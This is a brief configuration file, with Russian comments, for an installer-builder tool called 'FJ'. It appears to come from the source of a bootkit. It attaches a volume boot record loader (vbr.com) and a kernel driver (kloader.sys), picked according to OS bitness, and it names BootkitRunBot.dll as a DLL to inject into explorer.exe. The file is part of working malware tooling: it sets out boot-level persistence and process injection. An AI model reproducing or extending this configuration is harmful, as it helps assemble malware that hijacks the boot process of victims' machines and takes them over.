; Конфигурационный файл для утилиты FJ
; Описывает драйвера, которые необходимо прикрепить к инсталлеру
; При запуске инсталлер определяет разрядность ОС и устанавливает соответствующий драйвер


; Начальный загрузчик
BIN: Release\vbr.com

; Драйвер для 32х-битной ОС
DRV: ..\bin\Release\i386\kloader.sys

; Драйвер для 64х-битной ОС
;DRV: ..\bin\Release\amd64\kloader.sys

; 32х-битная DLL
DLL: BootkitRunBot.dll
; Список процессов куда инжектить 32х битную DLL
explorer.exe
